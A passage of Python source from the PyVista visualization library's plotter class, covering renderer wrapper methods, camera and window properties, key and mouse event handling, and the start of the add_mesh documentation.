>>> pl.enable_lightkit()
>>> actor = pl.add_mesh(pyvista.Cube(), show_edges=True)
>>> pl.show()
"""
renderers = [self.renderer] if only_active else self.renderers
light_kit = _vtk.vtkLightKit()
for renderer in renderers:
renderer.remove_all_lights()
# Use the renderer as a vtkLightKit parser.
# Feed it the LightKit, pop off the vtkLights, put back
# pyvista Lights. This is the price we must pay for using
# inheritance rather than composition.
light_kit.AddLightsToRenderer(renderer)
vtk_lights = renderer.lights
renderer.remove_all_lights()
for vtk_light in vtk_lights:
light = pyvista.Light.from_vtk(vtk_light)
renderer.add_light(light)
renderer.LightFollowCameraOn()
@wraps(Renderer.enable_anti_aliasing)
def enable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.enable_anti_aliasing``."""
for renderer in self.renderers:
renderer.enable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.disable_anti_aliasing)
def disable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.disable_anti_aliasing``."""
self.renderer.disable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.set_focus)
def set_focus(self, *args, render=True, **kwargs):
"""Wrap ``Renderer.set_focus``."""
log.debug('set_focus: %s, %s', str(args), str(kwargs))
self.renderer.set_focus(*args, **kwargs)
if render:
self.render()
@wraps(Renderer.set_position)
def set_position(self, *args, render=True, **kwargs):
"""Wrap ``Renderer.set_position``."""
self.renderer.set_position(*args, **kwargs)
if render:
self.render()
@wraps(Renderer.set_viewup)
def set_viewup(self, *args, render=True, **kwargs):
"""Wrap ``Renderer.set_viewup``."""
self.renderer.set_viewup(*args, **kwargs)
if render:
self.render()
@wraps(Renderer.add_orientation_widget)
def add_orientation_widget(self, *args, **kwargs):
"""Wrap ``Renderer.add_orientation_widget``."""
return self.renderer.add_orientation_widget(*args, **kwargs)
@wraps(Renderer.add_axes)
def add_axes(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes``."""
return self.renderer.add_axes(*args, **kwargs)
@wraps(Renderer.hide_axes)
def hide_axes(self, *args, **kwargs):
"""Wrap ``Renderer.hide_axes``."""
return self.renderer.hide_axes(*args, **kwargs)
@wraps(Renderer.show_axes)
def show_axes(self, *args, **kwargs):
"""Wrap ``Renderer.show_axes``."""
return self.renderer.show_axes(*args, **kwargs)
@wraps(Renderer.update_bounds_axes)
def update_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.update_bounds_axes``."""
return self.renderer.update_bounds_axes(*args, **kwargs)
@wraps(Renderer.add_chart)
def add_chart(self, *args, **kwargs):
"""Wrap ``Renderer.add_chart``."""
return self.renderer.add_chart(*args, **kwargs)
@wraps(Renderer.remove_chart)
def remove_chart(self, *args, **kwargs):
"""Wrap ``Renderer.remove_chart``."""
return self.renderer.remove_chart(*args, **kwargs)
@wraps(Renderer.add_actor)
def add_actor(self, *args, **kwargs):
"""Wrap ``Renderer.add_actor``."""
return self.renderer.add_actor(*args, **kwargs)
@wraps(Renderer.enable_parallel_projection)
def enable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.enable_parallel_projection``."""
return self.renderer.enable_parallel_projection(*args, **kwargs)
@wraps(Renderer.disable_parallel_projection)
def disable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.disable_parallel_projection``."""
return self.renderer.disable_parallel_projection(*args, **kwargs)
@wraps(Renderer.enable_shadows)
def enable_shadows(self, *args, **kwargs):
"""Wrap ``Renderer.enable_shadows``."""
return self.renderer.enable_shadows(*args, **kwargs)
@wraps(Renderer.disable_shadows)
def disable_shadows(self, *args, **kwargs):
"""Wrap ``Renderer.disable_shadows``."""
return self.renderer.disable_shadows(*args, **kwargs)
@property
def parallel_projection(self):
"""Return parallel projection state of active render window."""
return self.renderer.parallel_projection
@parallel_projection.setter
def parallel_projection(self, state):
"""Set parallel projection state of all active render windows."""
self.renderer.parallel_projection = state
@property
def parallel_scale(self):
"""Return parallel scale of active render window."""
return self.renderer.parallel_scale
@parallel_scale.setter
def parallel_scale(self, value):
"""Set parallel scale of all active render windows."""
self.renderer.parallel_scale = value
@wraps(Renderer.add_axes_at_origin)
def add_axes_at_origin(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes_at_origin``."""
return self.renderer.add_axes_at_origin(*args, **kwargs)
@wraps(Renderer.show_bounds)
def show_bounds(self, *args, **kwargs):
"""Wrap ``Renderer.show_bounds``."""
return self.renderer.show_bounds(*args, **kwargs)
@wraps(Renderer.add_bounding_box)
def add_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.add_bounding_box``."""
return self.renderer.add_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounding_box)
def remove_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounding_box``."""
return self.renderer.remove_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounds_axes)
def remove_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounds_axes``."""
return self.renderer.remove_bounds_axes(*args, **kwargs)
@wraps(Renderer.show_grid)
def show_grid(self, *args, **kwargs):
"""Wrap ``Renderer.show_grid``."""
return self.renderer.show_grid(*args, **kwargs)
@wraps(Renderer.set_scale)
def set_scale(self, *args, **kwargs):
"""Wrap ``Renderer.set_scale``."""
return self.renderer.set_scale(*args, **kwargs)
@wraps(Renderer.enable_eye_dome_lighting)
def enable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.enable_eye_dome_lighting``."""
return self.renderer.enable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.disable_eye_dome_lighting)
def disable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.disable_eye_dome_lighting``."""
self.renderer.disable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.reset_camera)
def reset_camera(self, *args, **kwargs):
"""Wrap ``Renderer.reset_camera``."""
self.renderer.reset_camera(*args, **kwargs)
self.render()
@wraps(Renderer.isometric_view)
def isometric_view(self, *args, **kwargs):
"""Wrap ``Renderer.isometric_view``."""
self.renderer.isometric_view(*args, **kwargs)
@wraps(Renderer.view_isometric)
def view_isometric(self, *args, **kwarg):
"""Wrap ``Renderer.view_isometric``."""
self.renderer.view_isometric(*args, **kwarg)
@wraps(Renderer.view_vector)
def view_vector(self, *args, **kwarg):
"""Wrap ``Renderer.view_vector``."""
self.renderer.view_vector(*args, **kwarg)
@wraps(Renderer.view_xy)
def view_xy(self, *args, **kwarg):
"""Wrap ``Renderer.view_xy``."""
self.renderer.view_xy(*args, **kwarg)
@wraps(Renderer.view_yx)
def view_yx(self, *args, **kwarg):
"""Wrap ``Renderer.view_yx``."""
self.renderer.view_yx(*args, **kwarg)
@wraps(Renderer.view_xz)
def view_xz(self, *args, **kwarg):
"""Wrap ``Renderer.view_xz``."""
self.renderer.view_xz(*args, **kwarg)
@wraps(Renderer.view_zx)
def view_zx(self, *args, **kwarg):
"""Wrap ``Renderer.view_zx``."""
self.renderer.view_zx(*args, **kwarg)
@wraps(Renderer.view_yz)
def view_yz(self, *args, **kwarg):
"""Wrap ``Renderer.view_yz``."""
self.renderer.view_yz(*args, **kwarg)
@wraps(Renderer.view_zy)
def view_zy(self, *args, **kwarg):
"""Wrap ``Renderer.view_zy``."""
self.renderer.view_zy(*args, **kwarg)
@wraps(Renderer.disable)
def disable(self, *args, **kwarg):
"""Wrap ``Renderer.disable``."""
self.renderer.disable(*args, **kwarg)
@wraps(Renderer.enable)
def enable(self, *args, **kwarg):
"""Wrap ``Renderer.enable``."""
self.renderer.enable(*args, **kwarg)
@wraps(Renderer.enable_depth_peeling)
def enable_depth_peeling(self, *args, **kwargs):
"""Wrap ``Renderer.enable_depth_peeling``."""
if hasattr(self, 'ren_win'):
result = self.renderer.enable_depth_peeling(*args, **kwargs)
if result:
self.ren_win.AlphaBitPlanesOn()
return result
@wraps(Renderer.disable_depth_peeling)
def disable_depth_peeling(self):
"""Wrap ``Renderer.disable_depth_peeling``."""
if hasattr(self, 'ren_win'):
self.ren_win.AlphaBitPlanesOff()
return self.renderer.disable_depth_peeling()
@wraps(Renderer.get_default_cam_pos)
def get_default_cam_pos(self, *args, **kwargs):
"""Wrap ``Renderer.get_default_cam_pos``."""
return self.renderer.get_default_cam_pos(*args, **kwargs)
@wraps(Renderer.remove_actor)
def remove_actor(self, *args, **kwargs):
"""Wrap ``Renderer.remove_actor``."""
for renderer in self.renderers:
renderer.remove_actor(*args, **kwargs)
return True
@wraps(Renderer.set_environment_texture)
def set_environment_texture(self, *args, **kwargs):
"""Wrap ``Renderer.set_environment_texture``."""
return self.renderer.set_environment_texture(*args, **kwargs)
#### Properties from Renderer ####
@property
def camera(self):
"""Return the active camera of the active renderer."""
if not self.camera_set:
self.camera_position = self.get_default_cam_pos()
self.reset_camera()
self.camera_set = True
return self.renderer.camera
@camera.setter
def camera(self, camera):
"""Set the active camera for the rendering scene."""
self.renderer.camera = camera
@property
def camera_set(self):
"""Return if the camera of the active renderer has been set."""
return self.renderer.camera_set
@camera_set.setter
def camera_set(self, is_set):
"""Set if the camera has been set on the active renderer."""
self.renderer.camera_set = is_set
@property
def bounds(self):
"""Return the bounds of the active renderer."""
return self.renderer.bounds
@property
def length(self):
"""Return the length of the diagonal of the bounding box of the scene."""
return self.renderer.length
@property
def center(self):
"""Return the center of the active renderer."""
return self.renderer.center
@property
def _scalar_bar_slots(self):
"""Return the scalar bar slots of the active renderer."""
return self.renderer._scalar_bar_slots
@_scalar_bar_slots.setter
def _scalar_bar_slots(self, value):
"""Set the scalar bar slots of the active renderer."""
self.renderer._scalar_bar_slots = value
@property
def _scalar_bar_slot_lookup(self):
"""Return the scalar bar slot lookup of the active renderer."""
return self.renderer._scalar_bar_slot_lookup
@_scalar_bar_slot_lookup.setter
def _scalar_bar_slot_lookup(self, value):
"""Set the scalar bar slot lookup of the active renderer."""
self.renderer._scalar_bar_slot_lookup = value
@property
def scale(self):
"""Return the scaling of the active renderer."""
return self.renderer.scale
@scale.setter
def scale(self, scale):
"""Set the scaling of the active renderer."""
self.renderer.set_scale(*scale)
@property
def camera_position(self):
"""Return camera position of the active render window."""
return self.renderer.camera_position
@camera_position.setter
def camera_position(self, camera_location):
"""Set camera position of the active render window."""
self.renderer.camera_position = camera_location
@property
def background_color(self):
"""Return the background color of the active render window."""
return self.renderers.active_renderer.background_color
@background_color.setter
def background_color(self, color):
"""Set the background color of all the render windows."""
self.set_background(color)
@property
def window_size(self):
"""Return the render window size in ``(width, height)``.
Examples
--------
Change the window size from ``200 x 200`` to ``400 x 400``.
>>> import pyvista
>>> pl = pyvista.Plotter(window_size=[200, 200])
>>> pl.window_size
[200, 200]
>>> pl.window_size = [400, 400]
>>> pl.window_size
[400, 400]
"""
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
"""Set the render window size."""
self.ren_win.SetSize(window_size[0], window_size[1])
@property
def image_depth(self):
"""Return a depth image representing current render window.
Helper attribute for ``get_image_depth``.
"""
return self.get_image_depth()
def _check_rendered(self):
"""Check if the render window has been shown and raise an exception if not."""
if not self._rendered:
raise AttributeError(
'\nThis plotter has not yet been set up and rendered '
'with ``show()``.\n'
'Consider setting ``off_screen=True`` '
'for off screen rendering.\n'
)
def _check_has_ren_win(self):
"""Check if render window attribute exists and raise an exception if not."""
if not hasattr(self, 'ren_win'):
raise AttributeError(
'\n\nTo retrieve an image after the render window '
'has been closed, set:\n\n'
' ``plotter.store_image = True``\n\n'
'before closing the plotter.'
)
@property
def image(self):
"""Return an image array of current render window.
To retrieve an image after the render window has been closed,
set: ``plotter.store_image = True`` before closing the plotter.
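        Examples
        --------
        A sketch of retrieving the image from an off-screen plot;
        ``store_image`` keeps the array available once the window closes.
        >>> import pyvista
        >>> pl = pyvista.Plotter(off_screen=True)
        >>> pl.store_image = True
        >>> _ = pl.add_mesh(pyvista.Sphere())
        >>> pl.show()
        >>> img = pl.image  # (height, width, 3) RGB array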
"""
if not hasattr(self, 'ren_win') and self.last_image is not None:
return self.last_image
self._check_rendered()
self._check_has_ren_win()
data = image_from_window(self.ren_win)
if self.image_transparent_background:
return data
# ignore alpha channel
return data[:, :, :-1]
def render(self):
"""Render the main window.
Does nothing until ``show`` has been called.
"""
if hasattr(self, 'ren_win') and not self._first_time:
log.debug('Rendering')
self.ren_win.Render()
self._rendered = True
@wraps(RenderWindowInteractor.add_key_event)
def add_key_event(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.add_key_event."""
if hasattr(self, 'iren'):
self.iren.add_key_event(*args, **kwargs)
def clear_events_for_key(self, key):
"""Remove the callbacks associated to the key.
Parameters
----------
key : str
Key to clear events for.
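        Examples
        --------
        One possible use, removing the default ``q`` (close) binding:
        >>> import pyvista
        >>> pl = pyvista.Plotter()
        >>> pl.clear_events_for_key('q')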
"""
self.iren.clear_events_for_key(key)
def store_mouse_position(self, *args):
"""Store mouse position."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.mouse_position = self.iren.get_event_position()
def store_click_position(self, *args):
"""Store click position in viewport coordinates."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.click_position = self.iren.get_event_position()
self.mouse_position = self.click_position
def track_mouse_position(self):
"""Keep track of the mouse position.
This will potentially slow down the interactor. No callbacks
supported here - use
:func:`pyvista.BasePlotter.track_click_position` instead.
"""
self.iren.track_mouse_position(self.store_mouse_position)
def untrack_mouse_position(self):
"""Stop tracking the mouse position."""
self.iren.untrack_mouse_position()
@wraps(RenderWindowInteractor.track_click_position)
def track_click_position(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.track_click_position."""
self.iren.track_click_position(*args, **kwargs)
@wraps(RenderWindowInteractor.untrack_click_position)
def untrack_click_position(self, *args, **kwargs):
"""Stop tracking the click position."""
self.iren.untrack_click_position(*args, **kwargs)
@property
def pickable_actors(self):
"""Return or set the pickable actors.
When setting, this will be the list of actors to make
pickable. All actors not in the list will be made unpickable.
If ``actors`` is ``None``, all actors will be made unpickable.
Returns
-------
list of vtk.vtkActors
Examples
--------
Add two actors to a :class:`pyvista.Plotter`, make one
pickable, and then list the pickable actors.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> sphere_actor = pl.add_mesh(pv.Sphere())
>>> cube_actor = pl.add_mesh(pv.Cube(), pickable=False, style='wireframe')
>>> len(pl.pickable_actors)
1
Set the pickable actors to both actors.
>>> pl.pickable_actors = [sphere_actor, cube_actor]
>>> len(pl.pickable_actors)
2
Set the pickable actors to ``None``.
>>> pl.pickable_actors = None
>>> len(pl.pickable_actors)
0
"""
pickable = []
for renderer in self.renderers:
for actor in renderer.actors.values():
if actor.GetPickable():
pickable.append(actor)
return pickable
@pickable_actors.setter
def pickable_actors(self, actors=None):
"""Set the pickable actors."""
actors = [] if actors is None else actors
if isinstance(actors, _vtk.vtkActor):
actors = [actors]
if not all([isinstance(actor, _vtk.vtkActor) for actor in actors]):
raise TypeError(
f'Expected a vtkActor instance or a list of vtkActors, got '
f'{[type(actor) for actor in actors]} instead.'
)
for renderer in self.renderers:
for actor in renderer.actors.values():
actor.SetPickable(actor in actors)
def _prep_for_close(self):
"""Make sure a screenshot is acquired before closing.
This doesn't actually close anything! It just preps the plotter for
closing.
"""
# Grab screenshot right before renderer closes
self.last_image = self.screenshot(True, return_img=True)
self.last_image_depth = self.get_image_depth()
def increment_point_size_and_line_width(self, increment):
"""Increment point size and line width of all actors.
For every actor in the scene, increment both its point size
and line width by the given value.
Parameters
----------
increment : float
Amount to increment point size and line width.
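        Examples
        --------
        A sketch of thickening every point and line in the scene by 5:
        >>> import pyvista
        >>> pl = pyvista.Plotter()
        >>> _ = pl.add_mesh(pyvista.Sphere(), style='points')
        >>> pl.increment_point_size_and_line_width(5)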
"""
for renderer in self.renderers:
for actor in renderer._actors.values():
if hasattr(actor, "GetProperty"):
prop = actor.GetProperty()
if hasattr(prop, "SetPointSize"):
prop.SetPointSize(prop.GetPointSize() + increment)
if hasattr(prop, "SetLineWidth"):
prop.SetLineWidth(prop.GetLineWidth() + increment)
self.render()
return
def reset_key_events(self):
"""Reset all of the key press events to their defaults."""
if hasattr(self, 'iren'):
self.iren.clear_key_event_callbacks()
self.add_key_event('q', self._prep_for_close) # Add no matter what
b_left_down_callback = lambda: self.iren.add_observer(
'LeftButtonPressEvent', self.left_button_down
)
self.add_key_event('b', b_left_down_callback)
self.add_key_event('v', lambda: self.isometric_view_interactive())
self.add_key_event('C', lambda: self.enable_cell_picking())
self.add_key_event('Up', lambda: self.camera.Zoom(1.05))
self.add_key_event('Down', lambda: self.camera.Zoom(0.95))
self.add_key_event('plus', lambda: self.increment_point_size_and_line_width(1))
self.add_key_event('minus', lambda: self.increment_point_size_and_line_width(-1))
@wraps(RenderWindowInteractor.key_press_event)
def key_press_event(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.key_press_event."""
self.iren.key_press_event(*args, **kwargs)
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click."""
if hasattr(self.ren_win, 'GetOffScreenFramebuffer'):
if not self.ren_win.GetOffScreenFramebuffer().GetFBOIndex():
                # must raise an error here, as this causes a segfault on VTK9
raise ValueError('Invoking helper with no framebuffer')
# Get 2D click location on window
click_pos = self.iren.get_event_position()
# Get corresponding click location in the 3D plot
picker = _vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
@wraps(RenderWindowInteractor.enable_trackball_style)
def enable_trackball_style(self):
"""Wrap RenderWindowInteractor.enable_trackball_style."""
self.iren.enable_trackball_style()
@wraps(RenderWindowInteractor.enable_trackball_actor_style)
def enable_trackball_actor_style(self):
"""Wrap RenderWindowInteractor.enable_trackball_actor_style."""
self.iren.enable_trackball_actor_style()
@wraps(RenderWindowInteractor.enable_image_style)
def enable_image_style(self):
"""Wrap RenderWindowInteractor.enable_image_style."""
self.iren.enable_image_style()
@wraps(RenderWindowInteractor.enable_joystick_style)
def enable_joystick_style(self):
"""Wrap RenderWindowInteractor.enable_joystick_style."""
self.iren.enable_joystick_style()
@wraps(RenderWindowInteractor.enable_joystick_actor_style)
def enable_joystick_actor_style(self):
"""Wrap RenderWindowInteractor.enable_joystick_actor_style."""
self.iren.enable_joystick_actor_style()
@wraps(RenderWindowInteractor.enable_zoom_style)
def enable_zoom_style(self):
"""Wrap RenderWindowInteractor.enable_zoom_style."""
self.iren.enable_zoom_style()
@wraps(RenderWindowInteractor.enable_terrain_style)
def enable_terrain_style(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.enable_terrain_style."""
self.iren.enable_terrain_style(*args, **kwargs)
@wraps(RenderWindowInteractor.enable_rubber_band_style)
def enable_rubber_band_style(self):
"""Wrap RenderWindowInteractor.enable_rubber_band_style."""
self.iren.enable_rubber_band_style()
@wraps(RenderWindowInteractor.enable_rubber_band_2d_style)
def enable_rubber_band_2d_style(self):
"""Wrap RenderWindowInteractor.enable_rubber_band_2d_style."""
self.iren.enable_rubber_band_2d_style()
def enable_stereo_render(self):
"""Enable stereo rendering.
Disable this with :func:`disable_stereo_render
<BasePlotter.disable_stereo_render>`
Examples
--------
Enable stereo rendering to show a cube as an anaglyph image.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.enable_stereo_render()
>>> pl.show()
"""
if hasattr(self, 'ren_win'):
self.ren_win.StereoRenderOn()
self.ren_win.SetStereoTypeToAnaglyph()
def disable_stereo_render(self):
"""Disable stereo rendering.
Enable again with :func:`enable_stereo_render
<BasePlotter.enable_stereo_render>`
Examples
--------
Enable and then disable stereo rendering. It should show a simple cube.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.enable_stereo_render()
>>> pl.disable_stereo_render()
>>> pl.show()
"""
if hasattr(self, 'ren_win'):
self.ren_win.StereoRenderOff()
def hide_axes_all(self):
"""Hide the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.hide_axes()
def show_axes_all(self):
"""Show the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.show_axes()
def isometric_view_interactive(self):
"""Set the current interactive render window to isometric view."""
interactor = self.iren.get_interactor_style()
renderer = interactor.GetCurrentRenderer()
if renderer is None:
renderer = self.renderer
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""Update window, redraw, process messages query.
Parameters
----------
stime : int, optional
            Duration of the timer that interrupts the
            vtkRenderWindowInteractor, in milliseconds.
force_redraw : bool, optional
Call ``render`` immediately.
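        Examples
        --------
        A sketch of a manual update loop; this assumes the plotter was
        shown with ``interactive_update=True`` so the window stays open.
        >>> import pyvista
        >>> pl = pyvista.Plotter()
        >>> _ = pl.add_mesh(pyvista.Sphere())
        >>> pl.show(interactive_update=True)
        >>> for _ in range(10):
        ...     pl.update(stime=100)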
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if self.iren is not None:
update_rate = self.iren.get_desired_update_rate()
if (curr_time - Plotter.last_update_time) > (1.0 / update_rate):
self.right_timer_id = self.iren.create_repeating_timer(stime)
self.render()
Plotter.last_update_time = curr_time
return
if force_redraw:
self.render()
def add_mesh(
self,
mesh,
color=None,
style=None,
scalars=None,
clim=None,
show_edges=None,
edge_color=None,
point_size=5.0,
line_width=None,
opacity=1.0,
flip_scalars=False,
lighting=None,
n_colors=256,
interpolate_before_map=True,
cmap=None,
label=None,
reset_camera=None,
scalar_bar_args=None,
show_scalar_bar=None,
multi_colors=False,
name=None,
texture=None,
render_points_as_spheres=None,
render_lines_as_tubes=False,
smooth_shading=None,
split_sharp_edges=False,
ambient=0.0,
diffuse=1.0,
specular=0.0,
specular_power=100.0,
nan_color=None,
nan_opacity=1.0,
culling=None,
rgb=None,
categories=False,
silhouette=False,
use_transparency=False,
below_color=None,
above_color=None,
annotations=None,
pickable=True,
preference="point",
log_scale=False,
pbr=False,
metallic=0.0,
roughness=0.5,
render=True,
component=None,
**kwargs,
):
"""Add any PyVista/VTK mesh or dataset that PyVista can wrap to the scene.
This method is using a mesh representation to view the surfaces
and/or geometry of datasets. For volume rendering, see
:func:`pyvista.BasePlotter.add_volume`.
Parameters
----------
mesh : pyvista.DataSet or pyvista.MultiBlock
Any PyVista or VTK mesh is supported. Also, any dataset
that :func:`pyvista.wrap` can handle including NumPy
arrays of XYZ points.
color : color_like, optional, defaults to white
Use to make the entire mesh have a single solid color.
Either a string, RGB list, or hex color string. For example:
``color='white'``, ``color='w'``, ``color=[1.0, 1.0, 1.0]``, or
``color='#FFFFFF'``. Color will be overridden if scalars are
specified.
style : str, optional
Visualization style of the mesh. One of the following:
``style='surface'``, ``style='wireframe'``, ``style='points'``.
Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a
wireframe of the outer geometry.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name
of an array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active
scalars are used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
edge_color : color_like, optional, defaults to black
The solid color to give the edges when ``show_edges=True``.
Either a string, RGB list, or hex color string.
point_size : float, optional
            Point size of any nodes in the dataset plotted. Also
            applicable when ``style='points'``. Default ``5.0``.
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
opacity : float, str, array-like
Opacity of the mesh. If a single float value is given, it
will be the global opacity of the mesh and uniformly
applied everywhere - should be between 0 and 1. A string
can also be specified to map the scalars range to a
predefined opacity transfer function (options include:
``'linear'``, ``'linear_r'``, ``'geom'``, ``'geom_r'``).
A string could also be used to map a scalars array from
the mesh to the opacity (must have same number of elements
as the ``scalars`` argument). Or you can pass a custom
made transfer function that is an array either
``n_colors`` in length or shorter.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r``
suffix to do this as well.
lighting : bool, optional
Enable or disable view direction lighting. Default ``False``.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalars display. Default is
``True``. When ``False``, OpenGL will interpolate the
            mapped colors which can result in showing colors that are
not present in the color map.
cmap : str, list, optional
Name of the Matplotlib colormap to use when mapping the
``scalars``. See available Matplotlib colormaps. Only
applicable for when displaying ``scalars``. Requires
Matplotlib to be installed. ``colormap`` is also an
accepted alias for this. If ``colorcet`` or ``cmocean``
are installed, their colormaps can be specified by name.
You can also specify a list of colors to override an
existing colormap with a custom one. For example, to
create a three color colormap you might specify
``['green', 'red', 'blue']``.
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the
scalar bar to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If ``False``, a scalar bar will not be added to the
scene. Defaults to ``True``.
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
        texture : vtk.vtkTexture or np.ndarray or str or bool, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
datasets. If set to ``True``, the first available texture
on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
render_points_as_spheres : bool, optional
Render points as spheres rather than dots.
render_lines_as_tubes : bool, optional
Show lines as thick tubes rather than flat lines. Control
the width with ``line_width``.
smooth_shading : bool, optional
Enable smooth shading when ``True`` using either the
Gouraud or Phong shading algorithm. When ``False``, use
flat shading. Automatically enabled when ``pbr=True``.
See :ref:`shading_example`.
split_sharp_edges : bool, optional
Split sharp edges exceeding 30 degrees when plotting with
smooth shading. Control the angle with the optional
keyword argument ``feature_angle``. By default this is
``False``. Note that enabling this will create a copy of
the input mesh within the plotter. See
:ref:`shading_example`.
ambient : float, optional
            When lighting is enabled, this is the amount of light in
            the range of 0 to 1 (default 0.0) that reaches the actor
            independent of its orientation toward the light source.
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0.
specular : float, optional
The specular lighting coefficient. Default 0.0.
specular_power : float, optional
The specular power. Between 0.0 and 128.0.
nan_color : color_like, optional, defaults to gray
The color to use for all ``NaN`` values in the plotted
scalar array.
nan_opacity : float, optional
Opacity of ``NaN`` values. Should be between 0 and 1.
Default 1.0.
culling : str, optional
Does not render faces that are culled. Options are
``'front'`` or ``'back'``. This can be helpful for dense
surface meshes, especially when edges are visible, but can
cause flat meshes to be partially displayed. Defaults to
``False``.
rgb : bool, optional
            If a 2-dimensional array is passed as the scalars, plot
those values as RGB(A) colors. ``rgba`` is also an
accepted alias for this. Opacity (the A) is optional. If
a scalars array ending with ``"_rgba"`` is passed, the default
becomes ``True``. This can be overridden by setting this
parameter to ``False``.
categories : bool, optional
If set to ``True``, then the number of unique values in
the scalar array will be used as the ``n_colors``
argument.
silhouette : dict, bool, optional
If set to ``True``, plot a silhouette highlight for the
mesh. This feature is only available for a triangulated
``PolyData``. As a ``dict``, it contains the properties
of the silhouette to display:
* ``color``: ``color_like``, color of the silhouette
* ``line_width``: ``float``, edge width
* ``opacity``: ``float`` between 0 and 1, edge transparency
* ``feature_angle``: If a ``float``, display sharp edges
exceeding that angle in degrees.
* ``decimate``: ``float`` between 0 and 1, level of decimation
use_transparency : bool, optional
Invert the opacity mappings and make the values correspond
to transparency.
below_color : color_like, optional
Solid color for values below the scalars range
(``clim``). This will automatically set the scalar bar
``below_label`` to ``'Below'``.
above_color : color_like, optional
            Solid color for values above the scalars range
(``clim``). This will automatically set the scalar bar
``above_label`` to ``'Above'``.
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float
values in the scalars range to annotate on the scalar bar
            and the values are the string annotations.
pickable : bool, optional
Set whether this actor is pickable.
preference : str, optional
When ``mesh.n_points == mesh.n_cells`` and setting
scalars, this parameter sets how the scalars will be
            mapped to the mesh. Default ``'points'``, which causes
            the scalars to be associated with the mesh points. Can
            be either ``'points'`` or ``'cells'``.
log_scale : bool, optional
Use log scale when mapping data to colors. Scalars less
than zero are mapped to the smallest representable
            positive float. Default: ``False``.
pbr : bool, optional
Enable physics based rendering (PBR) if the mesh is
``PolyData``. Use the ``color`` argument to set the base
color. This is only available in VTK>=9.
metallic : float, optional
Usually this value is either 0 or 1 for a real material
but any value in between is valid. This parameter is only
used by PBR interpolation. Default value is 0.0.
roughness : float, optional
This value has to be between 0 (glossy) and 1 (rough). A
glossy material has reflections and a high specular
part. This parameter is only used by PBR
interpolation. Default value is 0.5.
render : bool, optional
Force a render when ``True``. Default ``True``.
component : int, optional
Set component of vector valued scalars to plot. Must be
nonnegative, if supplied. If ``None``, the magnitude of
the vector is plotted.
**kwargs : dict, optional
Optional developer keyword arguments.
Returns
-------
vtk.vtkActor
VTK actor of the mesh.
Examples
--------
Add a sphere to the plotter and show it with a custom scalar
bar title.
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['Data'] = sphere.points[:, 2]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere,
... scalar_bar_args={'title': 'Z Position'})
>>> plotter.show()
        Plot using RGB colors defined per cell. Note that since the
        number of points and the number of cells are identical, we
        have to pass ``preference='cell'``.
>>> import pyvista
>>> import numpy as np
